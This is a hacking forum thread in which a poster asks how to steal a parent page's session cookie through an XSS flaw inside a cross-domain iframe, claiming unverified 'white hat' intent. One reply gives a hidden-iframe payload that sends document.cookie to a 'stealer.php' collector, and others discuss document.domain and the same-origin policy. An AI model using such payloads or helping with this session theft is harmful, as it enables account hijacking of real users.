Obtaining parent cookies from an iframe

I am working on some cookie stealing. I have found where to do the XSS injection, and I have got the PHP and JS written up properly. It works fine. The problem is, it is returning the cookie saved by the iframe, not the parent document. Is there even a way to access this cookie? My best find was someone using parent.document.cookie, but I couldn't get that to work. A nudge in the right direction would be extremely appreciated.

By the way, this is just some white hat for a friend. Nothing illegal.

Trying to get to the third party cookies? I think this is what you are looking for: http://the-stickman.com/web-development/iframes-third-party-cookies-and-the-documentdomain-property/. document.domain may have access for you.

markup<iframe height='0' width='0' src="javascript:document.location='site.com/stealer.php?cookie=' + document.cookie;"></iframe>

I really doubt if anyone here cares if it's 'white' or 'black' hat…

zbert, thanks for the reply. However, that appears to only deal with cross-subdomain cookies.

xof, thank you for being entirely unhelpful. Reading is useful.

I should clarify my problem a bit further. The injection point is inside the iframe. The iframe is stored on an entirely different server. It does not even have the same domain name. When it returns the cookie and saves it, it returns the PHPSESSID that the iframe is storing. I want it to return and save the cookie of the parent document that the iframe is stored on, as that is the one with the main site's session data.

…Well now that you've finally worded your question correctly:

It's not possible to steal cookies that way unless the different servers are actually set up to interact with one another in the correct manner.

Look at this link (took me about two seconds to find by searching 'cookies from another domain' in google): http://www.15seconds.com/issue/971108.htm The examples are in ASP, but you should get the gist.

So what you're saying is that if I find an XSS hole in hellboundhackers.org, I can then get the cookies from paypal.com

If this was true, everyone would be screwed.

Nice try though.

xof wrote: …Well now that you've finally worded your question correctly:

It's not possible to steal cookies that way unless the different servers are actually set up to interact with one another in the correct manner.

Look at this link (took me about two seconds to find by searching 'cookies from another domain' in google): http://www.15seconds.com/issue/971108.htm The examples are in ASP, but you should get the gist.

So what you're saying is that if I find an XSS hole in hellboundhackers.org, I can then get the cookies from paypal.com

If this was true, everyone would be screwed.

Nice try though.

The problem is, it is returning the cookie saved by the iframe, not the parent document. Oh, because that doesn't make it clear the document.cookie DOESN'T WORK. If you are going to be an ass, at least admit you were wrong. The pages are linked and do communicate with each other and modify each other's data. That link was surprisingly useful. I was searching more for parent to child and less about cross domain, which is why I did not find it.

Just a heads-up: I have no problem with you being an ass. You should probably do two things, though.

1. Admit it when you messed up. You just look dumb when you try and cover it up.
2. Study a few of MoshBat's posts when he is annoying people. You will see he actually has fun. Try actually having fun while being an ass instead of just being an ass for no reason.

Same Orgin Policy. The guy wasn't an ass, btw.

spyware wrote: Same Orgin Policy. The guy wasn't an ass, btw. Ah, thanks. That is quite helpful. Eh, I have a pretty broad definition of ass. Not reading my post and then blaming me for it makes him an ass in my book. Most people on the internet fit into my definition. Maybe I should consider changing it.